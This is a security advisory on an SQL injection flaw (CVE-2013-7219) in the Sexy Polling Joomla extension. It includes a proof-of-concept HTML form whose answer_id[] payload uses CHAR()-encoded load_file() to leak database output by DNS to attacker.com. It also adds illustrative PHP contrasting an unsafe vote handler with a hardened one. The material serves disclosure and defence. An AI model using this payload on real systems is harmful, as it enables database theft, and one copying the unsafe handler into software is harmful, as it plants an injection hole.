SQL Injection in Sexy Polling Joomla Extension

2013-12-26T00:00:00
ID HTB23193
Type htbridge
Reporter High-Tech Bridge
Modified 2014-01-09T00:00:00

Description

High-Tech Bridge Security Research Lab discovered a vulnerability in the Sexy Polling Joomla Extension, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219
The vulnerability exists due to insufficient validation of the "answer_id[]" HTTP POST parameter passed to the "/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.
The following exploitation example is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of ".attacker.com" (a domain whose DNS server is controlled by the attacker), where the subdomain is the output of version() (or any other sensitive output from the database):
<form action="http://[host]/components/com_sexypolling/vote.php" method="post" name="main">
<input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','','','')
-- ">
<input type="submit" id="btn">
</form>
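As an added example that is not part of the advisory or of the extension's code: a hypothetical Joomla 3 style vote handler showing the unsafe pattern the advisory describes (each answer_id[] element concatenated into the INSERT) beside a hardened version. The table name, column names and function names are assumptions made for illustration.

```php
<?php
// Added example, not the Sexy Polling extension's own code. Shows the class of bug
// in the advisory (answer_id[] concatenated into SQL) next to a hardened handler.
// Table name, column names and function names are assumptions for illustration.
defined('_JEXEC') or die;

// UNSAFE (assumed shape of the bug): every element of answer_id[] is pasted into
// the INSERT as-is, so a value that closes the quote, as in the PoC above,
// becomes part of the statement.
function recordVoteUnsafe(JDatabaseDriver $db, array $answerIds, $pollId)
{
    $sql = "INSERT INTO #__sexypolling_votes (poll_id, answer_id, ip, date) VALUES ";
    foreach ($answerIds as $answerId) {
        $sql .= "('" . $pollId . "','" . $answerId . "','" . $_SERVER['REMOTE_ADDR'] . "',NOW()),";
    }
    $db->setQuery(rtrim($sql, ','))->execute();
}

// HARDENED: the parameter is read through JInput with the 'array' filter, every
// element must be a plain positive decimal integer (anything else is dropped),
// and the statement is built with the query builder so the driver quotes values.
function recordVoteSafe(JDatabaseDriver $db, $pollId)
{
    $input = JFactory::getApplication()->input;
    $raw   = $input->get('answer_id', array(), 'array');   // always an array
    $ids   = array();
    foreach ($raw as $value) {
        // ctype_digit rather than a bare (int) cast: (int)"5',(select ...)" would
        // silently become 5 and hide the probe instead of rejecting it.
        if (is_string($value) && ctype_digit($value) && (int) $value > 0) {
            $ids[(int) $value] = true;   // keyed to de-duplicate repeated ids
        }
    }
    if (empty($ids)) {
        return 0;   // nothing valid to record; the caller should answer with an error
    }

    $query = $db->getQuery(true)
        ->insert($db->quoteName('#__sexypolling_votes'))
        ->columns($db->quoteName(array('poll_id', 'answer_id', 'ip', 'date')));
    $ip = $input->server->get('REMOTE_ADDR', '', 'string');
    foreach (array_keys($ids) as $answerId) {
        $query->values(implode(',', array((int) $pollId, $answerId, $db->quote($ip), 'NOW()')));
    }
    $db->setQuery($query)->execute();
    return count($ids);
}
```

Because the PoC's exfiltration depends on load_file(), running the application's database account without the MySQL FILE privilege also closes that channel, independently of the code fix.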